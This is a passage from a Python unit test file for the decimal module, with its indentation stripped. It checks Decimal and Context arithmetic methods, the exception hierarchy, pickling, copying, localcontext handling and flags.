self.assertRaises(TypeError, D(1).is_zero, context=xc)
self.assertFalse(D("0.01").is_normal(context=xc))
self.assertTrue(D("0.01").is_subnormal(context=xc))
self.assertRaises(TypeError, D(1).adjusted, context=xc)
self.assertRaises(TypeError, D(1).conjugate, context=xc)
self.assertRaises(TypeError, D(1).radix, context=xc)
self.assertEqual(D(-111).logb(context=xc), 2)
self.assertEqual(D(0).logical_invert(context=xc), 1)
self.assertEqual(D('0.01').number_class(context=xc), '+Subnormal')
self.assertEqual(D('0.21').to_eng_string(context=xc), '0.21')
self.assertEqual(D('11').logical_and(D('10'), context=xc), 0)
self.assertEqual(D('11').logical_or(D('10'), context=xc), 1)
self.assertEqual(D('01').logical_xor(D('10'), context=xc), 1)
self.assertEqual(D('23').rotate(1, context=xc), 3)
self.assertEqual(D('23').rotate(1, context=xc), 3)
xc.clear_flags()
self.assertRaises(Overflow,
D('23').scaleb, 1, context=xc)
self.assertTrue(xc.flags[Overflow])
self.assertFalse(c.flags[Overflow])
self.assertEqual(D('23').shift(-1, context=xc), 0)
self.assertRaises(TypeError, D.from_float, 1.1, context=xc)
self.assertRaises(TypeError, D(0).as_tuple, context=xc)
self.assertEqual(D(1).canonical(), 1)
self.assertRaises(TypeError, D("-1").copy_abs, context=xc)
self.assertRaises(TypeError, D("-1").copy_negate, context=xc)
self.assertRaises(TypeError, D(1).canonical, context="x")
self.assertRaises(TypeError, D(1).canonical, xyz="x")
def test_exception_hierarchy(self):
decimal = self.decimal
DecimalException = decimal.DecimalException
InvalidOperation = decimal.InvalidOperation
FloatOperation = decimal.FloatOperation
DivisionByZero = decimal.DivisionByZero
Overflow = decimal.Overflow
Underflow = decimal.Underflow
Subnormal = decimal.Subnormal
Inexact = decimal.Inexact
Rounded = decimal.Rounded
Clamped = decimal.Clamped
self.assertTrue(issubclass(DecimalException, ArithmeticError))
self.assertTrue(issubclass(InvalidOperation, DecimalException))
self.assertTrue(issubclass(FloatOperation, DecimalException))
self.assertTrue(issubclass(FloatOperation, TypeError))
self.assertTrue(issubclass(DivisionByZero, DecimalException))
self.assertTrue(issubclass(DivisionByZero, ZeroDivisionError))
self.assertTrue(issubclass(Overflow, Rounded))
self.assertTrue(issubclass(Overflow, Inexact))
self.assertTrue(issubclass(Overflow, DecimalException))
self.assertTrue(issubclass(Underflow, Inexact))
self.assertTrue(issubclass(Underflow, Rounded))
self.assertTrue(issubclass(Underflow, Subnormal))
self.assertTrue(issubclass(Underflow, DecimalException))
self.assertTrue(issubclass(Subnormal, DecimalException))
self.assertTrue(issubclass(Inexact, DecimalException))
self.assertTrue(issubclass(Rounded, DecimalException))
self.assertTrue(issubclass(Clamped, DecimalException))
self.assertTrue(issubclass(decimal.ConversionSyntax, InvalidOperation))
self.assertTrue(issubclass(decimal.DivisionImpossible, InvalidOperation))
self.assertTrue(issubclass(decimal.DivisionUndefined, InvalidOperation))
self.assertTrue(issubclass(decimal.DivisionUndefined, ZeroDivisionError))
self.assertTrue(issubclass(decimal.InvalidContext, InvalidOperation))
class CPythonAPItests(PythonAPItests):
decimal = C
class PyPythonAPItests(PythonAPItests):
decimal = P
class ContextAPItests(unittest.TestCase):
def test_none_args(self):
Context = self.decimal.Context
InvalidOperation = self.decimal.InvalidOperation
DivisionByZero = self.decimal.DivisionByZero
Overflow = self.decimal.Overflow
c1 = Context()
c2 = Context(prec=None, rounding=None, Emax=None, Emin=None,
capitals=None, clamp=None, flags=None, traps=None)
for c in [c1, c2]:
self.assertEqual(c.prec, 28)
self.assertEqual(c.rounding, ROUND_HALF_EVEN)
self.assertEqual(c.Emax, 999999)
self.assertEqual(c.Emin, -999999)
self.assertEqual(c.capitals, 1)
self.assertEqual(c.clamp, 0)
assert_signals(self, c, 'flags', [])
assert_signals(self, c, 'traps', [InvalidOperation, DivisionByZero,
Overflow])
@cpython_only
def test_from_legacy_strings(self):
import _testcapi
c = self.decimal.Context()
for rnd in RoundingModes:
c.rounding = _testcapi.unicode_legacy_string(rnd)
self.assertEqual(c.rounding, rnd)
s = _testcapi.unicode_legacy_string('')
self.assertRaises(TypeError, setattr, c, 'rounding', s)
s = _testcapi.unicode_legacy_string('ROUND_\x00UP')
self.assertRaises(TypeError, setattr, c, 'rounding', s)
def test_pickle(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
Context = self.decimal.Context
savedecimal = sys.modules['decimal']
# Round trip
sys.modules['decimal'] = self.decimal
c = Context()
e = pickle.loads(pickle.dumps(c, proto))
self.assertEqual(c.prec, e.prec)
self.assertEqual(c.Emin, e.Emin)
self.assertEqual(c.Emax, e.Emax)
self.assertEqual(c.rounding, e.rounding)
self.assertEqual(c.capitals, e.capitals)
self.assertEqual(c.clamp, e.clamp)
self.assertEqual(c.flags, e.flags)
self.assertEqual(c.traps, e.traps)
# Test interchangeability
combinations = [(C, P), (P, C)] if C else [(P, P)]
for dumper, loader in combinations:
for ri, _ in enumerate(RoundingModes):
for fi, _ in enumerate(OrderedSignals[dumper]):
for ti, _ in enumerate(OrderedSignals[dumper]):
prec = random.randrange(1, 100)
emin = random.randrange(-100, 0)
emax = random.randrange(1, 100)
caps = random.randrange(2)
clamp = random.randrange(2)
# One module dumps
sys.modules['decimal'] = dumper
c = dumper.Context(
prec=prec, Emin=emin, Emax=emax,
rounding=RoundingModes[ri],
capitals=caps, clamp=clamp,
flags=OrderedSignals[dumper][:fi],
traps=OrderedSignals[dumper][:ti]
)
s = pickle.dumps(c, proto)
# The other module loads
sys.modules['decimal'] = loader
d = pickle.loads(s)
self.assertIsInstance(d, loader.Context)
self.assertEqual(d.prec, prec)
self.assertEqual(d.Emin, emin)
self.assertEqual(d.Emax, emax)
self.assertEqual(d.rounding, RoundingModes[ri])
self.assertEqual(d.capitals, caps)
self.assertEqual(d.clamp, clamp)
assert_signals(self, d, 'flags', OrderedSignals[loader][:fi])
assert_signals(self, d, 'traps', OrderedSignals[loader][:ti])
sys.modules['decimal'] = savedecimal
def test_equality_with_other_types(self):
Decimal = self.decimal.Decimal
self.assertIn(Decimal(10), ['a', 1.0, Decimal(10), (1,2), {}])
self.assertNotIn(Decimal(10), ['a', 1.0, (1,2), {}])
def test_copy(self):
# All copies should be deep
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy()
self.assertNotEqual(id(c), id(d))
self.assertNotEqual(id(c.flags), id(d.flags))
self.assertNotEqual(id(c.traps), id(d.traps))
k1 = set(c.flags.keys())
k2 = set(d.flags.keys())
self.assertEqual(k1, k2)
self.assertEqual(c.flags, d.flags)
def test__clamp(self):
# In Python 3.2, the private attribute `_clamp` was made
# public (issue 8540), with the old `_clamp` becoming a
# property wrapping `clamp`. For the duration of Python 3.2
# only, the attribute should be gettable/settable via both
# `clamp` and `_clamp`; in Python 3.3, `_clamp` should be
# removed.
Context = self.decimal.Context
c = Context()
self.assertRaises(AttributeError, getattr, c, '_clamp')
def test_abs(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.abs(Decimal(-1))
self.assertEqual(c.abs(-1), d)
self.assertRaises(TypeError, c.abs, '-1')
def test_add(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.add(Decimal(1), Decimal(1))
self.assertEqual(c.add(1, 1), d)
self.assertEqual(c.add(Decimal(1), 1), d)
self.assertEqual(c.add(1, Decimal(1)), d)
self.assertRaises(TypeError, c.add, '1', 1)
self.assertRaises(TypeError, c.add, 1, '1')
def test_compare(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.compare(Decimal(1), Decimal(1))
self.assertEqual(c.compare(1, 1), d)
self.assertEqual(c.compare(Decimal(1), 1), d)
self.assertEqual(c.compare(1, Decimal(1)), d)
self.assertRaises(TypeError, c.compare, '1', 1)
self.assertRaises(TypeError, c.compare, 1, '1')
def test_compare_signal(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.compare_signal(Decimal(1), Decimal(1))
self.assertEqual(c.compare_signal(1, 1), d)
self.assertEqual(c.compare_signal(Decimal(1), 1), d)
self.assertEqual(c.compare_signal(1, Decimal(1)), d)
self.assertRaises(TypeError, c.compare_signal, '1', 1)
self.assertRaises(TypeError, c.compare_signal, 1, '1')
def test_compare_total(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.compare_total(Decimal(1), Decimal(1))
self.assertEqual(c.compare_total(1, 1), d)
self.assertEqual(c.compare_total(Decimal(1), 1), d)
self.assertEqual(c.compare_total(1, Decimal(1)), d)
self.assertRaises(TypeError, c.compare_total, '1', 1)
self.assertRaises(TypeError, c.compare_total, 1, '1')
def test_compare_total_mag(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.compare_total_mag(Decimal(1), Decimal(1))
self.assertEqual(c.compare_total_mag(1, 1), d)
self.assertEqual(c.compare_total_mag(Decimal(1), 1), d)
self.assertEqual(c.compare_total_mag(1, Decimal(1)), d)
self.assertRaises(TypeError, c.compare_total_mag, '1', 1)
self.assertRaises(TypeError, c.compare_total_mag, 1, '1')
def test_copy_abs(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy_abs(Decimal(-1))
self.assertEqual(c.copy_abs(-1), d)
self.assertRaises(TypeError, c.copy_abs, '-1')
def test_copy_decimal(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy_decimal(Decimal(-1))
self.assertEqual(c.copy_decimal(-1), d)
self.assertRaises(TypeError, c.copy_decimal, '-1')
def test_copy_negate(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy_negate(Decimal(-1))
self.assertEqual(c.copy_negate(-1), d)
self.assertRaises(TypeError, c.copy_negate, '-1')
def test_copy_sign(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy_sign(Decimal(1), Decimal(-2))
self.assertEqual(c.copy_sign(1, -2), d)
self.assertEqual(c.copy_sign(Decimal(1), -2), d)
self.assertEqual(c.copy_sign(1, Decimal(-2)), d)
self.assertRaises(TypeError, c.copy_sign, '1', -2)
self.assertRaises(TypeError, c.copy_sign, 1, '-2')
def test_divide(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.divide(Decimal(1), Decimal(2))
self.assertEqual(c.divide(1, 2), d)
self.assertEqual(c.divide(Decimal(1), 2), d)
self.assertEqual(c.divide(1, Decimal(2)), d)
self.assertRaises(TypeError, c.divide, '1', 2)
self.assertRaises(TypeError, c.divide, 1, '2')
def test_divide_int(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.divide_int(Decimal(1), Decimal(2))
self.assertEqual(c.divide_int(1, 2), d)
self.assertEqual(c.divide_int(Decimal(1), 2), d)
self.assertEqual(c.divide_int(1, Decimal(2)), d)
self.assertRaises(TypeError, c.divide_int, '1', 2)
self.assertRaises(TypeError, c.divide_int, 1, '2')
def test_divmod(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.divmod(Decimal(1), Decimal(2))
self.assertEqual(c.divmod(1, 2), d)
self.assertEqual(c.divmod(Decimal(1), 2), d)
self.assertEqual(c.divmod(1, Decimal(2)), d)
self.assertRaises(TypeError, c.divmod, '1', 2)
self.assertRaises(TypeError, c.divmod, 1, '2')
def test_exp(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.exp(Decimal(10))
self.assertEqual(c.exp(10), d)
self.assertRaises(TypeError, c.exp, '10')
def test_fma(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.fma(Decimal(2), Decimal(3), Decimal(4))
self.assertEqual(c.fma(2, 3, 4), d)
self.assertEqual(c.fma(Decimal(2), 3, 4), d)
self.assertEqual(c.fma(2, Decimal(3), 4), d)
self.assertEqual(c.fma(2, 3, Decimal(4)), d)
self.assertEqual(c.fma(Decimal(2), Decimal(3), 4), d)
self.assertRaises(TypeError, c.fma, '2', 3, 4)
self.assertRaises(TypeError, c.fma, 2, '3', 4)
self.assertRaises(TypeError, c.fma, 2, 3, '4')
# Issue 12079 for Context.fma ...
self.assertRaises(TypeError, c.fma,
Decimal('Infinity'), Decimal(0), "not a decimal")
self.assertRaises(TypeError, c.fma,
Decimal(1), Decimal('snan'), 1.222)
# ... and for Decimal.fma.
self.assertRaises(TypeError, Decimal('Infinity').fma,
Decimal(0), "not a decimal")
self.assertRaises(TypeError, Decimal(1).fma,
Decimal('snan'), 1.222)
def test_is_finite(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_finite(Decimal(10))
self.assertEqual(c.is_finite(10), d)
self.assertRaises(TypeError, c.is_finite, '10')
def test_is_infinite(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_infinite(Decimal(10))
self.assertEqual(c.is_infinite(10), d)
self.assertRaises(TypeError, c.is_infinite, '10')
def test_is_nan(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_nan(Decimal(10))
self.assertEqual(c.is_nan(10), d)
self.assertRaises(TypeError, c.is_nan, '10')
def test_is_normal(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_normal(Decimal(10))
self.assertEqual(c.is_normal(10), d)
self.assertRaises(TypeError, c.is_normal, '10')
def test_is_qnan(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_qnan(Decimal(10))
self.assertEqual(c.is_qnan(10), d)
self.assertRaises(TypeError, c.is_qnan, '10')
def test_is_signed(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_signed(Decimal(10))
self.assertEqual(c.is_signed(10), d)
self.assertRaises(TypeError, c.is_signed, '10')
def test_is_snan(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_snan(Decimal(10))
self.assertEqual(c.is_snan(10), d)
self.assertRaises(TypeError, c.is_snan, '10')
def test_is_subnormal(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_subnormal(Decimal(10))
self.assertEqual(c.is_subnormal(10), d)
self.assertRaises(TypeError, c.is_subnormal, '10')
def test_is_zero(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_zero(Decimal(10))
self.assertEqual(c.is_zero(10), d)
self.assertRaises(TypeError, c.is_zero, '10')
def test_ln(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.ln(Decimal(10))
self.assertEqual(c.ln(10), d)
self.assertRaises(TypeError, c.ln, '10')
def test_log10(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.log10(Decimal(10))
self.assertEqual(c.log10(10), d)
self.assertRaises(TypeError, c.log10, '10')
def test_logb(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logb(Decimal(10))
self.assertEqual(c.logb(10), d)
self.assertRaises(TypeError, c.logb, '10')
def test_logical_and(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logical_and(Decimal(1), Decimal(1))
self.assertEqual(c.logical_and(1, 1), d)
self.assertEqual(c.logical_and(Decimal(1), 1), d)
self.assertEqual(c.logical_and(1, Decimal(1)), d)
self.assertRaises(TypeError, c.logical_and, '1', 1)
self.assertRaises(TypeError, c.logical_and, 1, '1')
def test_logical_invert(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logical_invert(Decimal(1000))
self.assertEqual(c.logical_invert(1000), d)
self.assertRaises(TypeError, c.logical_invert, '1000')
def test_logical_or(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logical_or(Decimal(1), Decimal(1))
self.assertEqual(c.logical_or(1, 1), d)
self.assertEqual(c.logical_or(Decimal(1), 1), d)
self.assertEqual(c.logical_or(1, Decimal(1)), d)
self.assertRaises(TypeError, c.logical_or, '1', 1)
self.assertRaises(TypeError, c.logical_or, 1, '1')
def test_logical_xor(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logical_xor(Decimal(1), Decimal(1))
self.assertEqual(c.logical_xor(1, 1), d)
self.assertEqual(c.logical_xor(Decimal(1), 1), d)
self.assertEqual(c.logical_xor(1, Decimal(1)), d)
self.assertRaises(TypeError, c.logical_xor, '1', 1)
self.assertRaises(TypeError, c.logical_xor, 1, '1')
def test_max(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.max(Decimal(1), Decimal(2))
self.assertEqual(c.max(1, 2), d)
self.assertEqual(c.max(Decimal(1), 2), d)
self.assertEqual(c.max(1, Decimal(2)), d)
self.assertRaises(TypeError, c.max, '1', 2)
self.assertRaises(TypeError, c.max, 1, '2')
def test_max_mag(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.max_mag(Decimal(1), Decimal(2))
self.assertEqual(c.max_mag(1, 2), d)
self.assertEqual(c.max_mag(Decimal(1), 2), d)
self.assertEqual(c.max_mag(1, Decimal(2)), d)
self.assertRaises(TypeError, c.max_mag, '1', 2)
self.assertRaises(TypeError, c.max_mag, 1, '2')
def test_min(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.min(Decimal(1), Decimal(2))
self.assertEqual(c.min(1, 2), d)
self.assertEqual(c.min(Decimal(1), 2), d)
self.assertEqual(c.min(1, Decimal(2)), d)
self.assertRaises(TypeError, c.min, '1', 2)
self.assertRaises(TypeError, c.min, 1, '2')
def test_min_mag(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.min_mag(Decimal(1), Decimal(2))
self.assertEqual(c.min_mag(1, 2), d)
self.assertEqual(c.min_mag(Decimal(1), 2), d)
self.assertEqual(c.min_mag(1, Decimal(2)), d)
self.assertRaises(TypeError, c.min_mag, '1', 2)
self.assertRaises(TypeError, c.min_mag, 1, '2')
def test_minus(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.minus(Decimal(10))
self.assertEqual(c.minus(10), d)
self.assertRaises(TypeError, c.minus, '10')
def test_multiply(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.multiply(Decimal(1), Decimal(2))
self.assertEqual(c.multiply(1, 2), d)
self.assertEqual(c.multiply(Decimal(1), 2), d)
self.assertEqual(c.multiply(1, Decimal(2)), d)
self.assertRaises(TypeError, c.multiply, '1', 2)
self.assertRaises(TypeError, c.multiply, 1, '2')
def test_next_minus(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.next_minus(Decimal(10))
self.assertEqual(c.next_minus(10), d)
self.assertRaises(TypeError, c.next_minus, '10')
def test_next_plus(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.next_plus(Decimal(10))
self.assertEqual(c.next_plus(10), d)
self.assertRaises(TypeError, c.next_plus, '10')
def test_next_toward(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.next_toward(Decimal(1), Decimal(2))
self.assertEqual(c.next_toward(1, 2), d)
self.assertEqual(c.next_toward(Decimal(1), 2), d)
self.assertEqual(c.next_toward(1, Decimal(2)), d)
self.assertRaises(TypeError, c.next_toward, '1', 2)
self.assertRaises(TypeError, c.next_toward, 1, '2')
def test_normalize(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.normalize(Decimal(10))
self.assertEqual(c.normalize(10), d)
self.assertRaises(TypeError, c.normalize, '10')
def test_number_class(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
self.assertEqual(c.number_class(123), c.number_class(Decimal(123)))
self.assertEqual(c.number_class(0), c.number_class(Decimal(0)))
self.assertEqual(c.number_class(-45), c.number_class(Decimal(-45)))
def test_plus(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.plus(Decimal(10))
self.assertEqual(c.plus(10), d)
self.assertRaises(TypeError, c.plus, '10')
def test_power(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.power(Decimal(1), Decimal(4))
self.assertEqual(c.power(1, 4), d)
self.assertEqual(c.power(Decimal(1), 4), d)
self.assertEqual(c.power(1, Decimal(4)), d)
self.assertEqual(c.power(Decimal(1), Decimal(4)), d)
self.assertRaises(TypeError, c.power, '1', 4)
self.assertRaises(TypeError, c.power, 1, '4')
self.assertEqual(c.power(modulo=5, b=8, a=2), 1)
def test_quantize(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.quantize(Decimal(1), Decimal(2))
self.assertEqual(c.quantize(1, 2), d)
self.assertEqual(c.quantize(Decimal(1), 2), d)
self.assertEqual(c.quantize(1, Decimal(2)), d)
self.assertRaises(TypeError, c.quantize, '1', 2)
self.assertRaises(TypeError, c.quantize, 1, '2')
def test_remainder(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.remainder(Decimal(1), Decimal(2))
self.assertEqual(c.remainder(1, 2), d)
self.assertEqual(c.remainder(Decimal(1), 2), d)
self.assertEqual(c.remainder(1, Decimal(2)), d)
self.assertRaises(TypeError, c.remainder, '1', 2)
self.assertRaises(TypeError, c.remainder, 1, '2')
def test_remainder_near(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.remainder_near(Decimal(1), Decimal(2))
self.assertEqual(c.remainder_near(1, 2), d)
self.assertEqual(c.remainder_near(Decimal(1), 2), d)
self.assertEqual(c.remainder_near(1, Decimal(2)), d)
self.assertRaises(TypeError, c.remainder_near, '1', 2)
self.assertRaises(TypeError, c.remainder_near, 1, '2')
def test_rotate(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.rotate(Decimal(1), Decimal(2))
self.assertEqual(c.rotate(1, 2), d)
self.assertEqual(c.rotate(Decimal(1), 2), d)
self.assertEqual(c.rotate(1, Decimal(2)), d)
self.assertRaises(TypeError, c.rotate, '1', 2)
self.assertRaises(TypeError, c.rotate, 1, '2')
def test_sqrt(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.sqrt(Decimal(10))
self.assertEqual(c.sqrt(10), d)
self.assertRaises(TypeError, c.sqrt, '10')
def test_same_quantum(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.same_quantum(Decimal(1), Decimal(2))
self.assertEqual(c.same_quantum(1, 2), d)
self.assertEqual(c.same_quantum(Decimal(1), 2), d)
self.assertEqual(c.same_quantum(1, Decimal(2)), d)
self.assertRaises(TypeError, c.same_quantum, '1', 2)
self.assertRaises(TypeError, c.same_quantum, 1, '2')
def test_scaleb(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.scaleb(Decimal(1), Decimal(2))
self.assertEqual(c.scaleb(1, 2), d)
self.assertEqual(c.scaleb(Decimal(1), 2), d)
self.assertEqual(c.scaleb(1, Decimal(2)), d)
self.assertRaises(TypeError, c.scaleb, '1', 2)
self.assertRaises(TypeError, c.scaleb, 1, '2')
def test_shift(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.shift(Decimal(1), Decimal(2))
self.assertEqual(c.shift(1, 2), d)
self.assertEqual(c.shift(Decimal(1), 2), d)
self.assertEqual(c.shift(1, Decimal(2)), d)
self.assertRaises(TypeError, c.shift, '1', 2)
self.assertRaises(TypeError, c.shift, 1, '2')
def test_subtract(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.subtract(Decimal(1), Decimal(2))
self.assertEqual(c.subtract(1, 2), d)
self.assertEqual(c.subtract(Decimal(1), 2), d)
self.assertEqual(c.subtract(1, Decimal(2)), d)
self.assertRaises(TypeError, c.subtract, '1', 2)
self.assertRaises(TypeError, c.subtract, 1, '2')
def test_to_eng_string(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.to_eng_string(Decimal(10))
self.assertEqual(c.to_eng_string(10), d)
self.assertRaises(TypeError, c.to_eng_string, '10')
def test_to_sci_string(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.to_sci_string(Decimal(10))
self.assertEqual(c.to_sci_string(10), d)
self.assertRaises(TypeError, c.to_sci_string, '10')
def test_to_integral_exact(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.to_integral_exact(Decimal(10))
self.assertEqual(c.to_integral_exact(10), d)
self.assertRaises(TypeError, c.to_integral_exact, '10')
def test_to_integral_value(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.to_integral_value(Decimal(10))
self.assertEqual(c.to_integral_value(10), d)
self.assertRaises(TypeError, c.to_integral_value, '10')
self.assertRaises(TypeError, c.to_integral_value, 10, 'x')
class CContextAPItests(ContextAPItests):
decimal = C
class PyContextAPItests(ContextAPItests):
decimal = P
class ContextWithStatement(unittest.TestCase):
# Can't do these as docstrings until Python 2.6
# as doctest can't handle __future__ statements
def test_localcontext(self):
# Use a copy of the current context in the block
getcontext = self.decimal.getcontext
localcontext = self.decimal.localcontext
orig_ctx = getcontext()
with localcontext() as enter_ctx:
set_ctx = getcontext()
final_ctx = getcontext()
self.assertIs(orig_ctx, final_ctx, 'did not restore context correctly')
self.assertIsNot(orig_ctx, set_ctx, 'did not copy the context')
self.assertIs(set_ctx, enter_ctx, '__enter__ returned wrong context')
def test_localcontextarg(self):
# Use a copy of the supplied context in the block
Context = self.decimal.Context
getcontext = self.decimal.getcontext
localcontext = self.decimal.localcontext
localcontext = self.decimal.localcontext
orig_ctx = getcontext()
new_ctx = Context(prec=42)
with localcontext(new_ctx) as enter_ctx:
set_ctx = getcontext()
final_ctx = getcontext()
self.assertIs(orig_ctx, final_ctx, 'did not restore context correctly')
self.assertEqual(set_ctx.prec, new_ctx.prec, 'did not set correct context')
self.assertIsNot(new_ctx, set_ctx, 'did not copy the context')
self.assertIs(set_ctx, enter_ctx, '__enter__ returned wrong context')
def test_nested_with_statements(self):
# Use a copy of the supplied context in the block
Decimal = self.decimal.Decimal
Context = self.decimal.Context
getcontext = self.decimal.getcontext
localcontext = self.decimal.localcontext
Clamped = self.decimal.Clamped
Overflow = self.decimal.Overflow
orig_ctx = getcontext()
orig_ctx.clear_flags()
new_ctx = Context(Emax=384)
with localcontext() as c1:
self.assertEqual(c1.flags, orig_ctx.flags)
self.assertEqual(c1.traps, orig_ctx.traps)
c1.traps[Clamped] = True
c1.Emin = -383
self.assertNotEqual(orig_ctx.Emin, -383)
self.assertRaises(Clamped, c1.create_decimal, '0e-999')
self.assertTrue(c1.flags[Clamped])
with localcontext(new_ctx) as c2:
self.assertEqual(c2.flags, new_ctx.flags)
self.assertEqual(c2.traps, new_ctx.traps)
self.assertRaises(Overflow, c2.power, Decimal('3.4e200'), 2)
self.assertFalse(c2.flags[Clamped])
self.assertTrue(c2.flags[Overflow])
del c2
self.assertFalse(c1.flags[Overflow])
del c1
self.assertNotEqual(orig_ctx.Emin, -383)
self.assertFalse(orig_ctx.flags[Clamped])
self.assertFalse(orig_ctx.flags[Overflow])
self.assertFalse(new_ctx.flags[Clamped])
self.assertFalse(new_ctx.flags[Overflow])
def test_with_statements_gc1(self):
localcontext = self.decimal.localcontext
with localcontext() as c1:
del c1
with localcontext() as c2:
del c2
with localcontext() as c3:
del c3
with localcontext() as c4:
del c4
def test_with_statements_gc2(self):
localcontext = self.decimal.localcontext
with localcontext() as c1:
with localcontext(c1) as c2:
del c1
with localcontext(c2) as c3:
del c2
with localcontext(c3) as c4:
del c3
del c4
def test_with_statements_gc3(self):
Context = self.decimal.Context
localcontext = self.decimal.localcontext
getcontext = self.decimal.getcontext
setcontext = self.decimal.setcontext
with localcontext() as c1:
del c1
n1 = Context(prec=1)
setcontext(n1)
with localcontext(n1) as c2:
del n1
self.assertEqual(c2.prec, 1)
del c2
n2 = Context(prec=2)
setcontext(n2)
del n2
self.assertEqual(getcontext().prec, 2)
n3 = Context(prec=3)
setcontext(n3)
self.assertEqual(getcontext().prec, 3)
with localcontext(n3) as c3:
del n3
self.assertEqual(c3.prec, 3)
del c3
n4 = Context(prec=4)
setcontext(n4)
del n4
self.assertEqual(getcontext().prec, 4)
with localcontext() as c4:
self.assertEqual(c4.prec, 4)
del c4
class CContextWithStatement(ContextWithStatement):
decimal = C
class PyContextWithStatement(ContextWithStatement):
decimal = P
class ContextFlags(unittest.TestCase):
def test_flags_irrelevant(self):
# check that the result (numeric result + flags raised) of an
# arithmetic operation doesn't depend on the current flags
Decimal = self.decimal.Decimal
Context = self.decimal.Context
Inexact = self.decimal.Inexact
Rounded = self.decimal.Rounded
Underflow = self.decimal.Underflow
Clamped = self.decimal.Clamped
Subnormal = self.decimal.Subnormal
def raise_error(context, flag):
if self.decimal == C:
context.flags[flag] = True
if context.traps[flag]:
raise flag
else:
context._raise_error(flag)
context = Context(prec=9, Emin = -425000000, Emax = 425000000,
rounding=ROUND_HALF_EVEN, traps=[], flags=[])
# operations that raise various flags, in the form (function, arglist)
operations = [
(context._apply, [Decimal("100E-425000010")]),
(context.sqrt, [Decimal(2)]),
(context.add, [Decimal("1.23456789"), Decimal("9.87654321")]),
(context.multiply, [Decimal("1.23456789"), Decimal("9.87654321")]),
(context.subtract, [Decimal("1.23456789"), Decimal("9.87654321")]),
]
# try various flags individually, then a whole lot at once
flagsets = [[Inexact], [Rounded], [Underflow], [Clamped], [Subnormal],
[Inexact, Rounded, Underflow, Clamped, Subnormal]]
for fn, args in operations:
# find answer and flags raised using a clean context
context.clear_flags()
ans = fn(*args)
flags = [k for k, v in context.flags.items() if v]
for extra_flags in flagsets:
